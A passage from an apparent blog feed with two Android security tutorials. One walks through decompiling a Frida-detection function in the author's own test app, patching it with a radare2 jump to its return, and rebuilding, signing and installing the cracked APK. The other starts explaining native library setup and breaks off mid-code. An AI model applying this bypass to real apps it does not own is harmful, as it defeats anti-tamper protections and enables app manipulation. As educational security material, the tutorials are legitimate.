If interpreting the assembly code becomes too complex, you can simplify the analysis by using the [Ghidra decompiler plugin for Radare2](https://github.com/radareorg/r2ghidra). This plugin integrates Ghidra’s powerful decompiler directly into Radare2, allowing you to convert assembly code into a more readable, C-like structure within the Radare2 environment. This can be incredibly helpful for understanding complex functions at a higher level, as it provides pseudocode instead of raw assembly instructions, making intricate code easier to interpret.
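
If the plugin is not installed yet, it can typically be added through radare2&apos;s package manager (assuming `r2pm` is initialized on your system):

```bash
# Update the package database, then clean-install the r2ghidra plugin
r2pm -U
r2pm -ci r2ghidra
```

With the plugin installed, the `pdg` command becomes available inside r2: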

```bash
pdg @ 0x00060b50

```

![](/content/images/2024/10/image-24.png)

Decompiling with the Ghidra plugin

&lt;details&gt;
&lt;summary&gt;Decompiled assembler code with ghidra plugin&lt;/summary&gt;

```cpp
void sym.Java_com_example_localauth_MainActivity_detectFridaAndExit(void)

{
    uint32_t *puVar1;
    uchar *puVar2;
    int64_t iVar3;
    int64_t iVar4;
    code *pcVar5;
    ulong uVar6;
    uchar auVar7 [16];
    char cVar8;
    int32_t iVar9;
    int64_t *piVar10;
    uint32_t *puVar11;
    uchar *puVar12;
    int64_t *piVar13;
    uint64_t *puVar14;
    uint64_t uVar15;
    uint64_t uVar16;
    uchar *puVar17;
    uchar *puVar18;
    uchar *puVar19;
    uchar *puVar20;
    uchar *puVar21;
    uchar *puVar22;
    uchar *puVar23;
    uchar *puVar24;
    uchar *puVar25;
    uchar *puVar26;
    uchar *puVar27;
    uchar *puVar28;
    uchar *puVar29;
    uchar *puVar30;
    uchar *puVar31;
    uint64_t *puVar32;
    int64_t in_FS_OFFSET;
    bool bVar33;
    ulong uStack_300;
    uchar auStack_2f8 [16];
    ulong auStack_2e8 [2];
    uchar auStack_2d8 [336];
    uchar auStack_188 [336];
    ulong uStack_38;

    uStack_38 = *(in_FS_OFFSET + 0x28);
    uStack_300 = 0x60b80;
    iVar9 = sym.imp.access(&quot;frida-agent&quot;, 0);
    puVar21 = &amp;stack0xfffffffffffffd08;
    if (iVar9 == -1) {
        *(&amp;stack0xfffffffffffffd08 + -8) = 0x60b97;
        iVar9 = sym.imp.access(0x42ee8, 0);
        puVar21 = *0x20 + -0x2f8;
        if (iVar9 == -1) {
            *(*0x20 + -0x300) = 0x60bae;
            iVar9 = sym.imp.access(0x42de5, 0);
            puVar21 = &amp;stack0xfffffffffffffd08;
            if (iVar9 == -1) {
                iVar3 = *0x20 + -0x188;
                *(&amp;stack0xfffffffffffffd08 + -8) = 0x60bd3;
                fcn.00061040(iVar3, &quot;/proc/self/maps&quot;, 8);
                puVar21 = *0x20 + -0x2f8;
                auVar7._8_8_ = 0;
                auVar7._0_8_ = 0;
                *(*0x20 + -0x2f8) = auVar7;
                *(&amp;stack0xfffffffffffffd08 + 0x10) = 0;
                puVar2 = &amp;stack0xfffffffffffffd08 + 0x20;
code_r0x00060c11:
                do {
                    iVar4 = *(*(puVar21 + 0x170) + -0x18);
                    *(puVar21 + -8) = 0x60c28;
                    fcn.000c9380(puVar2, iVar3 + iVar4);
                    puVar17 = puVar21;
                    *(puVar21 + -8) = 0x60c37;
                    piVar10 = fcn.000c9390(puVar2, _reloc.std::__ndk1::ctype_char_::id);
                    pcVar5 = *(*piVar10 + 0x38);
                    puVar18 = puVar17;
                    *(puVar17 + -8) = 0x60c45;
                    cVar8 = (*pcVar5)(piVar10, 10);
                    puVar19 = puVar18;
                    *(puVar18 + -8) = 0x60c4f;
                    fcn.000c93a0(puVar2);
                    *(puVar19 + -8) = 0x60c5e;
                    piVar10 = fcn.000611b0(iVar3, *0x20 + -0x2f8, cVar8);
                    puVar21 = puVar19;
                    puVar20 = puVar19;
                    if ((*(piVar10 + *(*piVar10 + -0x18) + 0x20) &amp; 5) != 0) {
                        *(puVar19 + -8) = 0x60d38;
                        fcn.00061040(puVar19 + 0x20, 0x422f8, 8);
                        puVar21 = puVar19;
                        puVar2 = puVar19 + 0x18;
                        goto code_r0x00060d71;
                    }
                    if ((*puVar19 &amp; 1) == 0) {
                        uVar15 = *puVar19 &gt;&gt; 1;
                        puVar31 = puVar19 + 1;
                        if (SBORROW8(uVar15, 5) == uVar15 + -5 &lt; 0) goto code_r0x00060ca1;
                    }
                    else {
                        uVar15 = *(puVar19 + 8);
                        puVar31 = *(puVar19 + 0x10);
                        if (SBORROW8(uVar15, 5) == uVar15 + -5 &lt; 0) {
code_r0x00060ca1:
                            puVar1 = puVar31 + uVar15;
                            puVar12 = puVar31;
                            do {
                                *(puVar20 + -8) = 0x60cc1;
                                puVar11 = sym.imp.memchr(puVar12, 0x66, uVar15 - 4);
                                puVar21 = puVar20;
                                if (puVar11 == NULL) break;
                                if ((*(puVar11 + 1) ^ 0x61 | *puVar11 ^ 0x64697266) == 0) {
                                    if (puVar11 != puVar1) {
                                        if (puVar11 - puVar31 == -1) goto code_r0x00060c11;
                                        goto code_r0x00060d04;
                                    }
                                    break;
                                }
                                puVar12 = puVar11 + 1;
                                uVar15 = puVar1 - puVar12;
                            } while (SBORROW8(uVar15, 5) == uVar15 + -5 &lt; 0);
                        }
                    }
                } while (true);
code_r0x00060d04:
                if (*(in_FS_OFFSET + 0x28) == *(puVar21 + 0x2c0)) {
    // WARNING: Subroutine does not return
                    *(puVar21 + -8) = 0x60d22;
                    sym.imp.exit(0);
                }
                goto code_r0x00061034;
            }
        }
    }
    if (*(in_FS_OFFSET + 0x28) == *(puVar21 + 0x2c0)) {
    // WARNING: Subroutine does not return
        *(puVar21 + -8) = 0x60fc6;
        sym.imp.exit(0);
    }
    goto code_r0x00061034;
code_r0x00060d71:
    do {
        iVar3 = *(*(puVar21 + 0x20) + -0x18);
        *(puVar21 + -8) = 0x60d8a;
        fcn.000c9380(puVar2, puVar21 + 0x20 + iVar3);
        puVar22 = puVar21;
        *(puVar21 + -8) = 0x60d99;
        piVar10 = fcn.000c9390(puVar2, _reloc.std::__ndk1::ctype_char_::id);
        pcVar5 = *(*piVar10 + 0x38);
        puVar23 = puVar22;
        *(puVar22 + -8) = 0x60da7;
        cVar8 = (*pcVar5)(piVar10, 10);
        *(puVar23 + -8) = 0x60db1;
        fcn.000c93a0(puVar2);
        *(puVar23 + -8) = 0x60dc0;
        piVar13 = fcn.000611b0(puVar21 + 0x20, puVar23, cVar8);
        piVar10 = _reloc.VTT_for_std::__ndk1::basic_ifstream_char__std::__ndk1::char_traits_char___;
        puVar21 = puVar22 + 0;
        puVar24 = puVar22 + 0;
        if ((*(piVar13 + *(*piVar13 + -0x18) + 0x20) &amp; 5) != 0) {
            iVar3 = *_reloc.VTT_for_std::__ndk1::basic_ifstream_char__std::__ndk1::char_traits_char___;
            iVar4 = _reloc.VTT_for_std::__ndk1::basic_ifstream_char__std::__ndk1::char_traits_char___[3];
            *(puVar23 + 0x20) = iVar3;
            *(puVar23 + *(iVar3 + -0x18) + 0x20) = iVar4;
            puVar26 = puVar22 + 0;
            *(puVar22 + -8) = 0x60f17;
            fcn.000c93d0(puVar23 + 0x30);
            puVar27 = puVar26;
            *(puVar26 + -8) = 0x60f28;
            fcn.000c93e0(puVar22 + 0x20, piVar10 + 1);
            *(puVar27 + -8) = 0x60f35;
            fcn.000c93f0(puVar26 + 0xd8);
            puVar28 = puVar27;
            if ((*puVar27 &amp; 1) != 0) {
                uVar6 = *(puVar27 + 0x10);
                *(puVar27 + -8) = 0x60f45;
                fcn.000c9350(uVar6);
                puVar28 = puVar27 + 0;
            }
            *(puVar28 + 0x170) = iVar3;
            *(puVar28 + *(iVar3 + -0x18) + 0x170) = iVar4;
            puVar29 = puVar28;
            *(puVar28 + -8) = 0x60f66;
            fcn.000c93d0(puVar28 + 0x180);
            puVar30 = puVar29;
            *(puVar29 + -8) = 0x60f76;
            fcn.000c93e0(puVar28 + 0x170, piVar10 + 1);
            *(puVar30 + -8) = 0x60f83;
            fcn.000c93f0(puVar29 + 0x228);
            puVar21 = puVar30;
            if (*(in_FS_OFFSET + 0x28) == *(puVar30 + 0x2c0)) {
                return;
            }
            goto code_r0x00061034;
        }
        uVar15 = puVar22[0] &gt;&gt; 1;
        bVar33 = (puVar22[0] &amp; 1) == 0;
        puVar31 = *(puVar23 + 0x10);
        if (bVar33) {
            puVar31 = puVar23 + 1;
        }
        if (!bVar33) {
            uVar15 = *(puVar23 + 8);
        }
        if (SBORROW8(uVar15, 0xf) == uVar15 + -0xf &lt; 0) {
            puVar32 = puVar31 + uVar15;
            puVar12 = puVar31;
            uVar16 = uVar15;
            while( true ) {
                *(puVar24 + -8) = 0x60e21;
                puVar14 = sym.imp.memchr(puVar12, 0x31, uVar16 - 0xe);
                puVar21 = puVar24;
                puVar25 = puVar24;
                if (puVar14 == NULL) break;
                if ((*(puVar14 + 7) ^ 0x32343037323a312e | *puVar14 ^ 0x2e302e302e373231) == 0) {
                    if ((puVar14 != puVar32) &amp;&amp; (puVar14 - puVar31 != -1)) goto code_r0x00060ed3;
                    break;
                }
                puVar12 = puVar14 + 1;
                uVar16 = puVar32 - puVar12;
                if (SBORROW8(uVar16, 0xf) != uVar16 + -0xf &lt; 0) break;
            }
            puVar12 = puVar31;
            if (SBORROW8(uVar15, 0xf) == uVar15 + -0xf &lt; 0) {
                do {
                    *(puVar25 + -8) = 0x60e84;
                    puVar14 = sym.imp.memchr(puVar12, 0x31, uVar15 - 0xe);
                    puVar21 = puVar25;
                    if (puVar14 == NULL) break;
                    if ((*(puVar14 + 7) ^ 0x33343037323a312e | *puVar14 ^ 0x2e302e302e373231) == 0) {
                        if (puVar14 != puVar32) {
                            if (puVar14 - puVar31 == -1) goto code_r0x00060d71;
                            goto code_r0x00060ed3;
                        }
                        break;
                    }
                    uVar15 = puVar32 - (puVar14 + 1);
                    puVar12 = puVar14 + 1;
                } while (SBORROW8(uVar15, 0xf) == uVar15 + -0xf &lt; 0);
            }
        }
    } while (true);
code_r0x00060ed3:
    if (*(in_FS_OFFSET + 0x28) == *(puVar21 + 0x2c0)) {
    // WARNING: Subroutine does not return
        *(puVar21 + -8) = 0x60ef1;
        sym.imp.exit(0);
    }
code_r0x00061034:
    // WARNING: Subroutine does not return
    *(puVar21 + -8) = 0x61039;
    sym.imp.__stack_chk_fail();
}

```
&lt;/details&gt;


As an extra tip, if you still find the assembly or decompiled pseudocode hard to interpret, you can paste it into ChatGPT or another LLM, which can produce a more readable pseudocode version and explain each part of the function in simpler terms. Combining the decompiler with this kind of assistance makes even complex native code approachable, but always verify the model&apos;s output against the actual disassembly, since language models can misread or invent details.

&lt;details&gt;
&lt;summary&gt;ChatGPT pseudocode&lt;/summary&gt;

```cpp
function detectFridaAndExit()

    // Stack setup and saving current state
    save_current_stack_state()
    
    // Check if the &quot;frida-agent&quot; string is found in the system
    if access(&quot;frida-agent&quot;) != -1 then
        exit_program()
    end if

    // Check if the &quot;frida-gadget&quot; string is found in the system
    if access(&quot;frida-gadget&quot;) != -1 then
        exit_program()
    end if

    // Check if the &quot;libfrida-gadget.so&quot; library is found in the system
    if access(&quot;libfrida-gadget.so&quot;) != -1 then
        exit_program()
    end if

    // Read and parse the &quot;/proc/self/maps&quot; to look for Frida-related strings
    maps_data = read_file(&quot;/proc/self/maps&quot;)
    for each line in maps_data do
        // Look for &quot;frida&quot; or related patterns in the process memory
        if line contains &quot;frida&quot; then
            exit_program()
        end if
    end for

    // Additional check: inspect &quot;/proc/net/tcp&quot; for Frida&apos;s presence
    tcp_data = read_file(&quot;/proc/net/tcp&quot;)
    if tcp_data contains &quot;127.0.0.1:27042&quot; or &quot;127.0.0.1:27043&quot; then
        exit_program()
    end if

    // Final integrity check of the stack
    if stack_modified() then
        exit_program()
    end if

    // Security stack check failed
    stack_security_check_fail()

end function



```
&lt;/details&gt;


# Modifying and Repacking the APK for Testing

To bypass the Frida detection in our modified APK, we’ll use a simple but effective technique. When reverse-engineering native libraries, we often have several options for modifying the flow of the code. For instance, we could locate conditional jumps that trigger `exit()` calls and modify them, or try to change the direction of code execution at key points. However, a reliable and straightforward approach—one that works in many cases—is to jump directly to the end of the function right at the start. This effectively skips all detection logic, allowing the function to “complete” without actually running its checks.

#### Step 1: Modifying the Function in Radare2

With Radare2 open, navigate to the start of the `detectFridaAndExit` function. Here, we’ll add a jump instruction that goes directly to the return (`ret`) instruction at the end of the function, bypassing all detection logic. This modification allows the app to continue running even if Frida is attached.

![](/content/images/2024/10/image-17.png)

Ret address

In Radare2, use the following command to write an unconditional jump to the return instruction’s address:

```bash
wa jmp 0x60fab

```

![](/content/images/2024/10/image-10.png)

Jumping to the ret address

This tells Radare2 to assemble an unconditional `jmp` to `0x60fab`, the address where the function naturally returns, and write it over the instruction at the current offset. As a result, when `detectFridaAndExit` is called, it will skip all the Frida detection code and go directly to the end.

#### Step 2: Recompiling the APK with APKTool

After modifying `libnative-lib.so`, we need to recompile the APK with the updated library. Use APKTool to rebuild the APK:

```bash
apktool b testing -o app-cracked.apk

```

Here, `testing` is the directory where we previously decompiled the APK, and `app-cracked.apk` is the name of the rebuilt APK. This command packages the APK with our modified native library, creating an APK file that’s ready for the next steps.

#### Step 3: Aligning, Signing, and Installing the APK

Once the native library has been modified, we need to repackage the APK to include the edited `libnative-lib.so`. This involves re-aligning, signing, and reinstalling the APK.

**Align the APK**:  
First, run `zipalign` to ensure the APK is properly aligned, which is necessary for Android to install it:

```bash
~/Android/Sdk/build-tools/34.0.0/zipalign -p -f 4 ./app-cracked.apk ./app-align.apk

```

**Sign the APK**:  
Use `apksigner` to sign the APK with your keystore. This step authenticates the APK for installation:

```bash
~/Android/Sdk/build-tools/34.0.0/apksigner sign --ks /home/rsgbengi/Desktop/android/testing.jks --out ./myapp-cracked-signed.apk ./app-align.apk

```

**Install the APK**:  
Finally, install the modified APK on your emulator:

```bash
adb install ./myapp-cracked-signed.apk

```

#### Step 4: Testing the Bypass with Frida

To verify that the detection has been bypassed, spawn the app with Frida and check whether it stays active instead of exiting immediately:

![](/content/images/2024/10/image-18.png)

Frida working correctly

![](/content/images/2024/10/image-19.png)

Bypassing Frida Detection

If everything worked, Frida should attach to the app without triggering an exit, and you should be able to interact with the app normally. The app will continue running even with Frida attached, confirming that the modified `detectFridaAndExit` function no longer executes its detection logic.

This method—redirecting the start of the function to jump directly to the end—provides a simple yet effective way to bypass security checks within native libraries, and it’s a reliable approach for many similar bypass scenarios.

# Conclusions

This chapter has demonstrated how patching native libraries can be an effective method to bypass security measures embedded within an application’s code. By diving directly into the native library, we not only located and analyzed the Frida detection logic but also modified it to allow Frida to attach without triggering the app&apos;s security response.

Here are the key takeaways:

1.  **Native Code Adds Complexity**: Implementing detection in native code increases the complexity for attackers, but as we’ve seen, it’s still possible to bypass these measures with tools like Radare2 and APKTool.
2.  **Limitations of Basic Obfuscation**: While obfuscation can help hide detection functions, relying on default ProGuard settings may not be sufficient to prevent a determined reverse engineer from finding critical functions. Custom obfuscation and strategic distribution of detection code across multiple activities can offer a more robust defense.
3.  **Direct Patching as a Powerful Technique**: Modifying the execution flow by redirecting jumps or altering return points within the native library proved to be a straightforward and effective way to neutralize security checks. This approach, though powerful, is challenging to implement in apps with more advanced obfuscation and layered defenses.

Understanding these techniques not only broadens our knowledge of Android app security but also highlights the importance of layered, well-implemented security measures. For developers, this serves as a reminder to go beyond default obfuscation and use more advanced techniques if the application’s security demands it. For reverse engineers, this chapter provides valuable tools for navigating and modifying native code, offering insights into how to analyze and neutralize embedded security mechanisms in real-world scenarios.

# Resources

-   APKTool - A Tool for Reverse Engineering Android APK Files. &quot;APKTool.&quot; Available at: [https://ibotpeaches.github.io/Apktool/](https://ibotpeaches.github.io/Apktool/)
-   Radare2 - Open-source Reverse Engineering Framework. &quot;Radare2.&quot; Available at: [https://rada.re/n/radare2.html](https://rada.re/n/radare2.html)
-   Ghidra - Software Reverse Engineering Framework. &quot;NSA Cybersecurity.&quot; Available at: [https://ghidra-sre.org/](https://ghidra-sre.org/)
-   Frida - Dynamic Instrumentation Toolkit. &quot;Frida.&quot; Available at: [https://frida.re](https://frida.re/)
-   Android ProGuard and R8 Guide. &quot;Android Developers.&quot; Available at: [https://developer.android.com/studio/build/shrink-code](https://developer.android.com/studio/build/shrink-code)
-   \[INSTALL\_FAILED\_INVALID\_APK: Failed to extract native libraries, res=-2\] after Compile. &quot;GitHub - Apktool Issue #1626.&quot; Available at: [https://github.com/iBotPeaches/Apktool/issues/1626](https://github.com/iBotPeaches/Apktool/issues/1626)
-   Ghidra Decompiler Plugin for Radare2. &quot;r2ghidra-dec GitHub Repository.&quot; Available at: [https://github.com/radareorg/r2ghidra-dec](https://github.com/radareorg/r2ghidra-dec)
-   Jadx - Dex to Java Decompiler. &quot;Jadx GitHub Repository.&quot; Available at: [https://github.com/skylot/jadx](https://github.com/skylot/jadx)</content:encoded><author>Ruben Santos</author></item><item><title>Enhancing Android Security with Native Libraries: Implementation and Evasion Techniques</title><link>https://www.kayssel.com/post/android-9</link><guid isPermaLink="true">https://www.kayssel.com/post/android-9</guid><description>Native libraries in Android boost security by adding low-level defenses, making bypass attempts harder. Still, tools like Frida can evade these measures. The next chapter will cover advanced techniques, including reverse engineering, to overcome tougher security setups</description><pubDate>Sun, 13 Oct 2024 10:57:50 GMT</pubDate><content:encoded># Leveraging Native Libraries for Enhanced Security in Android Applications

Native libraries in Android are compiled pieces of code, typically written in languages like C or C++, that an app can use to perform specific tasks more efficiently or securely than in Java or Kotlin. These libraries are compiled for various architectures (such as ARM or x86) and are included within the APK of the app. They allow direct access to system-level resources and hardware, making them ideal for performance-intensive tasks like gaming, audio, or graphics processing.

In the context of application security, native libraries can also serve as a defense mechanism against certain advanced attacks. For example, tools like Frida, which are used to manipulate the runtime of an Android app, often target the app&apos;s Java layer. By implementing security checks within native libraries, developers can make it much harder for such tools to modify or analyze their app.

Native libraries can also help enhance the security of other mechanisms, such as SSL pinning or anti-root checks, by making it more difficult for attackers to bypass these defenses. Since native code operates closer to the system level and outside the managed runtime environment, it becomes more challenging to hook into or manipulate, providing stronger protection against tampering and reverse-engineering. This makes native libraries an essential part of an app’s security strategy, particularly for sensitive operations that require higher levels of protection.

In this chapter, we&apos;ll explore how to configure and create code in native libraries, as well as their use in Android code and how they can be easily bypassed using Frida. In the next chapter, we&apos;ll see how things can get significantly more complex if a developer changes the way the native function is used and implements it differently in their code.

# Installing the NDK and CMake in Android Studio

To start using native libraries in your Android project, you first need to install the Android NDK and CMake. Follow these steps to set them up:

#### 1\. **Install the Android NDK and CMake**

1.  Open **Android Studio** and go to **File** &gt; **Settings** (on macOS, it&apos;s **Android Studio** &gt; **Preferences**).
2.  In the left-hand menu, navigate to **Appearance &amp; Behavior** &gt; **System Settings** &gt; **Android SDK**.
3.  In the **SDK Tools** tab, scroll through the list and check the following boxes:
    -   **NDK (Side by Side)**
    -   **CMake**
4.  Click **Apply** and then **OK** to install both tools.

![](/content/images/2024/09/image-18.png)

Installing NDK and CMake

### Creating the Necessary Files and Folders for Native Code

Once you have the NDK and CMake installed, the next step is to set up the required folders and files to start using native code in your Android project.

#### 1\. **Create the `cpp` Folder**

You will need to create a new folder inside your project to store the native code:

1.  In Android Studio, navigate to the **Project** view on the left panel.
2.  Right-click on the `src/main` directory, and select **New** &gt; **Directory**.
3.  Name the new folder `cpp`. This folder will contain all your native C++ source files.

#### 2\. **Create a `.cpp` File**

Now, create a C++ source file inside the `cpp` folder:

1.  Right-click on the newly created `cpp` folder, select **New** &gt; **C/C++ Source File**.
2.  Name the file, for example, `native-lib.cpp`.
3.  Inside this file, you can write a simple native function:

```cpp

#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;dirent.h&gt;  // To scan directories
#include &lt;unistd.h&gt;  // For access function
#include &lt;fstream&gt;   // To check for Frida processes
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;

extern &quot;C&quot; JNIEXPORT jstring JNICALL
Java_com_example_localauth_MainActivity_stringFromJNI(
        JNIEnv* env,
        jobject /* this */) {
    std::string hello = &quot;Hello from C++&quot;;
    return env-&gt;NewStringUTF(hello.c_str());
}

```

This will serve as a simple test function to ensure your native code is set up correctly.

#### 3\. **Create the `CMakeLists.txt` File**

To compile the native code, you need a `CMakeLists.txt` file:

1.  Right-click on the `cpp` folder, select **New** &gt; **File**.
2.  Name it `CMakeLists.txt` and add the following content:

```cmake
# Set the minimum required version of CMake
cmake_minimum_required(VERSION 3.4.1)

# Add the shared library, which will be named &apos;native-lib&apos; and will be compiled from the file native-lib.cpp
add_library(
        native-lib        # Name of the library
        SHARED            # Specifies that it is a shared library
        native-lib.cpp    # Source file
)

# Find the log library, which is required for Android

find_library(
        log-lib           # Name of the variable where the library path will be stored
        log               # Name of the system library to search for
)

# Link the native library with the found libraries (in this case log-lib)
target_link_libraries(
        native-lib        # Native library we are linking
        ${log-lib}        # Link the system library (log)
)

```

This configuration file tells CMake how to compile the `native-lib.cpp` file and links it to the required libraries.

#### 4\. **Folder Structure Overview**

After these steps, your folder structure should look like this:

![](/content/images/2024/10/image.png)

Folder structure overview

# Updating the `build.gradle.kts` File for Native Code

Now that we have created the necessary folders and files, you need to update your `build.gradle.kts` file to properly integrate the native code into the Android project. Add or modify the following sections so that your C++ files and CMake are properly linked.

Here’s what you need to check and modify:

#### 1\. **Add NDK and CMake Configuration**

Inside the `defaultConfig` block of `build.gradle.kts`, make sure the following settings are applied:

-   **`externalNativeBuild` block:** This block configures the native build system (in this case, CMake) and sets the compiler flags:

```kotlin
externalNativeBuild {
    cmake {
        cppFlags.add(&quot;-std=c++11&quot;) // Ensure you have the proper C++ version
    }
}

```

**`ndk` block:** Specify the ABIs (Application Binary Interfaces) so the native code is compiled for each supported architecture. Here’s how it should look:

```kotlin
ndk {
    abiFilters.addAll(listOf(&quot;armeabi-v7a&quot;, &quot;arm64-v8a&quot;, &quot;x86&quot;, &quot;x86_64&quot;))  // Add supported ABIs
}

```

#### 2\. **Include the CMake Path**

The `CMakeLists.txt` file you created needs to be referenced in `build.gradle.kts`. Add the following block at the `android` level (outside `defaultConfig`):

```kotlin
externalNativeBuild {
    cmake {
        path = file(&quot;src/main/cpp/CMakeLists.txt&quot;) // Path to your CMakeLists file
    }
}

```

This line ensures that Gradle knows where to find your native code build script.

#### 3\. **Check the NDK Version**

It’s good practice to pin the NDK version explicitly in `build.gradle.kts` so builds are reproducible across machines. Make sure it matches the version you installed:

```kotlin
ndkVersion = &quot;27.1.12297006&quot;

```

#### 4\. **Overall `build.gradle.kts` Configuration Example**

Here’s a complete example of the `build.gradle.kts` file with all the necessary settings in place:

&lt;details&gt;
&lt;summary&gt;Build.gradle.kts code&lt;/summary&gt;

```kotlin
plugins {
    alias(libs.plugins.android.application)
    alias(libs.plugins.jetbrains.kotlin.android)
}

android {
    namespace = &quot;com.example.localauth&quot;
    compileSdk = 34

    defaultConfig {
        applicationId = &quot;com.example.localauth&quot;
        minSdk = 24
        targetSdk = 34
        versionCode = 1
        versionName = &quot;1.0&quot;

        testInstrumentationRunner = &quot;androidx.test.runner.AndroidJUnitRunner&quot;
        vectorDrawables {
            useSupportLibrary = true
        }

        externalNativeBuild {
            cmake {
                cppFlags.add(&quot;-std=c++11&quot;)  // Set C++ version
            }
        }

        ndk {
            abiFilters.addAll(listOf(&quot;armeabi-v7a&quot;, &quot;arm64-v8a&quot;, &quot;x86&quot;, &quot;x86_64&quot;))  // Add supported ABIs
        }
    }

    externalNativeBuild {
        cmake {
            path = file(&quot;src/main/cpp/CMakeLists.txt&quot;)  // Path to CMakeLists.txt
        }
    }

    buildTypes {
        release {
            isMinifyEnabled = false
            proguardFiles(
                getDefaultProguardFile(&quot;proguard-android-optimize.txt&quot;),
                &quot;proguard-rules.pro&quot;
            )
        }
    }

    compileOptions {
        sourceCompatibility = JavaVersion.VERSION_1_8
        targetCompatibility = JavaVersion.VERSION_1_8
    }

    kotlinOptions {
        jvmTarget = &quot;1.8&quot;
    }

    buildFeatures {
        compose = true
    }

    composeOptions {
        kotlinCompilerExtensionVersion = &quot;1.5.1&quot;
    }

    packaging {
        resources {
            excludes += &quot;/META-INF/{AL2.0,LGPL2.1}&quot;
        }
    }

    ndkVersion = &quot;27.1.12297006&quot;
}

dependencies {
    implementation(libs.androidx.core.ktx)
    implementation(libs.androidx.lifecycle.runtime.ktx)
    implementation(libs.androidx.activity.compose)
    implementation(&quot;androidx.biometric:biometric:1.2.0-alpha05&quot;)
    implementation(platform(libs.androidx.compose.bom))
    implementation(libs.androidx.ui)
    implementation(libs.androidx.ui.graphics)
    implementation(libs.androidx.ui.tooling.preview)
    implementation(libs.androidx.material3)
    implementation(libs.androidx.appcompat)
    implementation(libs.material)
    implementation(libs.androidx.activity)
    implementation(libs.androidx.constraintlayout)
    testImplementation(libs.junit)
    androidTestImplementation(libs.androidx.junit)
    androidTestImplementation(libs.androidx.espresso.core)
    androidTestImplementation(platform(libs.androidx.compose.bom))
    androidTestImplementation(libs.androidx.ui.test.junit4)
    debugImplementation(libs.androidx.ui.tooling)
    debugImplementation(libs.androidx.ui.test.manifest)
}

```
&lt;/details&gt;


# Adding and Calling the Native Function in Your Application

Now that you have set up the native library, the next step is to call the native function from your Kotlin (or Java) code. Here’s how you can add the necessary code to connect the native C++ function to your Android application.

#### 1\. **Load the Native Library**

The first thing you need to do is load the native library into your Android app. This can be done using the `System.loadLibrary()` method in your `MainActivity.kt` (or any other activity where you want to use the native code).

In your `MainActivity.kt`, add the following code:

```kotlin
class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) 
        }
    }
...

```

#### 2\. **Declare the Native Function**

The `external` keyword declares the native function in Kotlin (Java uses `native` instead). It tells the runtime that the implementation lives in native code and will be resolved from the `native-lib` library we loaded, which was compiled from `native-lib.cpp`.

```kotlin
// Declare the native function
external fun stringFromJNI(): String

```

#### 3\. **Call the Native Function in Your UI**

After loading the native library and declaring the native method, you can call the `stringFromJNI()` function just like any other Kotlin (or Java) function.

```kotlin
class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) 
        }
    }
    external fun stringFromJNI(): String

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Message from C++: $messageFromNative&quot;)

```

#### 4\. **Testing the Application**

Once you have added the code above, you can run your application to ensure everything is working. If set up correctly, the native function `stringFromJNI()` should return a string from the C++ code and display it in logcat.

![](/content/images/2024/09/image-20.png)

Working example

&lt;details&gt;
&lt;summary&gt;MainActivity&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) // without the &quot;lib&quot; prefix or &quot;.so&quot; suffix
        }
    }
    external fun stringFromJNI(): String

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Message from C++: $messageFromNative&quot;)

        createKey()

        val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
        btnEncrypt.setOnClickListener {
            showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
        }

        val btnReset: Button = findViewById(R.id.btn_reset)
        btnReset.setOnClickListener {
            resetEncryptedData()
        }

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            showBiometricPrompt()
        }
    }


    // Create Key in Keystore
    private fun createKey() {
        val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
        val keyGenParameterSpec = KeyGenParameterSpec.Builder(
            keyAlias,
            KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
        ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
            .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
            .setUserAuthenticationRequired(true)
            .setInvalidatedByBiometricEnrollment(true)
            .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
            .build()

        keyGenerator.init(keyGenParameterSpec)
        keyGenerator.generateKey()
    }

    // Initialize the cipher for encryption/decryption
    private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
        return try {
            keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
            keyStore.load(null)

            val key = keyStore.getKey(keyAlias, null) as SecretKey
            cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

            if (mode == Cipher.ENCRYPT_MODE) {
                cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
